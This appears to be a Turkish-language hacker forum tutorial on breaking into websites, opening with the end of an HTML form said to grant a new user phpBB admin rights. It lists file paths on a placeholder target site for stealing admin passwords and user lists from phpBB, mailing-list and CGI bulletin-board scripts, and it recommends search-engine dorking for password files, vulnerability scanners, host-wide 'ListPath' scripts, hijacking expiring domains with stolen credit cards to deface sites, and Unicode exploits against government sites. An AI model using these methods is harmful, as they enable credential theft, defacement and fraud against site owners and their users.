<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarın 2.0.3 de db.php açığını duydum..
BuLabiLirsem yayınLarım..
Birde bazı .php dosyalarını çaLarak admin şifreLerine uLaşabiLiyorduk.
Sanırım config.php diydi.
Bunu FLashget webzip tarzı programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açığı
GoogLe dan aratıp vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin şifresine uLaşabiLirsiniz..
*Cgi script açıkLarı..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtası Sistemi) Bu sistem yukarıda size örneklediğim gibi siteye mesaj atmak için kullanılır.
Bu sistem bünyesinde bu bildiri tahtalarına üye kimselerin kullanıcı adı/şifre kombinasyonlarını bulundurur.Böylelikle istediğiniz kişi adına
bildiri tahtasına mesaj gönderebilirsiniz.
Açık : [URL="https://tik.lat/gfGKu"] http://www.hedefsite.com/cgi-bin/webBBS/profiles/[/URL] ya da [URL="https://tik.lat/r6MaM"] http://www.hedefsite.com/cgi-bin/webBBS/users/[/URL]
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldığı reklamları yayınlar.Her reklam için ayrı hesap vardır.
Bu açığı kullanarak kendi hazırladığınız bannerları sitede yayınlayabilirsiniz.Ayrıca diğer reklam verenlerin hesaplarını silmek ya da bannerlarını
değiştirmek elinizde.
Açık : [URL="https://tik.lat/YFwcP"] http://www.hedefsite.com/cgi-bin/advert/adpassword.txt[/URL] --> Şifrelerin bulunduğu .txt ..
WWWBoard Scriptleri
wEBBSS İLe aynı şekiLde..
Açık : [URL="https://tik.lat/bvreT"] http://www.hedefsite.com/cgi-bin/wwwebboard.txt[/URL]
Açık : [URL="https://tik.lat/YUOoh"] http://www.hedefsite.com/cgi-bin/wwwboard.txt[/URL]
Açık : [URL="https://tik.lat/r6GZu"] http://www.hedefsite.com/webboard/password.txt[/URL]
-------------------------
MaillistLer..
-------------------------
Açık : [URL="https://tik.lat/vgn3V"] http://www.hedefsite.com/cgi-bin/mailman/addresses.txt[/URL]
Açık : [URL="https://tik.lat/BHk8g"] http://www.hedefsite.com/cgi-bin/maillist/addresses.txt[/URL]
Açık : [URL="https://tik.lat/lZv3j"] http://www.hedefsite.com/cgi-bin/mail/addresses.txt[/URL]
Açık : [URL="https://tik.lat/tG0C4"] http://www.hedefsite.com/cgi-bin/maillist/users.txt[/URL]
AçıkLARI BuLmak..
Scriptler hakkında geniş bilginiz yoksa ve yukarıda örneklediğim türden belirli başlı açıkları bilmiyorsanız Cgi Zayıflık Tarayıcılarını kullanmanızı öneririm.
Çeşitli tarayıcılar var bu alanda*bir kısmını deniyebilirsiniz.Önemli olan tarayıcının bünyesinde bulundurduğu açık sayısı.Bu çok önemlidir.Bir tarayıcı bünyesinde
ne kadar çok açık bulundurursa o kadar şansınız artar.Tarayıcınızın güncelleme seçeneği varsa sık sık yenilemenizi öneriririm.Güncelleme seçeneği yoksa birden fazla
tarayıcı kullanmalısınız.Unutmamanız gereken en önemli nokta ise her bulduğunuz scripti hackliyemeyeceğiniz.
Size daha pratik bir yol daha söyliyeyim* [URL="https://tik.lat/Ojzc5"] www.arabul.com[/URL] - [URL="https://tik.lat/YP8eZ"] www.netbul.com[/URL] gibi siteler kayıtlı olan web siteleri içerisinde her türlü kelimeyi arama özelliğine sahiptir.Bu
tip arama motorlarına ****crawler denir.Yabancı servis olarak size tavsiyem [URL="https://tik.lat/Z2nQA"] www.webcrawler.com[/URL] ya da http://www.****crawler.com/www.****crawler.com[/URL].
Örnek Aratabileceğiniz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
*ExpLoitLer
Eksik oLduğum konu bu fazla biLgim yok buLabiLeceğiniz adresLer..
AdresLer:
[URL="https://tik.lat/ugO4r"] www.k-otik.com/exploits[/URL]
[URL="https://tik.lat/wLGvz"] www.securityfocus.com[/URL] gibi adreslerde buLabiLirsiniz..
5.ListPath
En sewdigiim hack yöntemLerinden biridir..
Bir php weya asp kodu çaLıştırarak o hostun tüm siteLere erişim hakkı sağLanır.ELmaLı şeker iLk çıktığında oLay yaratmıştı.
Fakat bu ListpathLeri nerden buLacağız??
Sitemizi inceLeyin we [URL="https://tik.lat/W3mZI"] www.kullanilmasiyasaknick[/URL] a da arada sırada bakınn..
Bu oLay free hostLarda çaLışmaz..Denemeyin yani..
HackLemeniz için bi hosttan yer kiraLamanız Lazım..
6.Domain reg..
Eğer hedef site mutLaka hackLenmek zorundaysa hostun bitiş tarihi yakınsa hemen bittği gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atın cc iLe yapabiLirsiniz bu oLayı..
Yine sitemizde dağıtıLıyor..
7.Birtakım bazı açıkLar..
Unicode commander.pL gibi eski fakat hakkını wermemiz gereknn açıkLar..
Unicode birçok devLet sitesinde duruyor haLa..
Commander.pL service.pwd cgi/bin açıkLarı bunLardan bahsetmiyorum..Zaten her yerde war ayrıca bu açıkLarı buLunduran pek site kaLmadı..
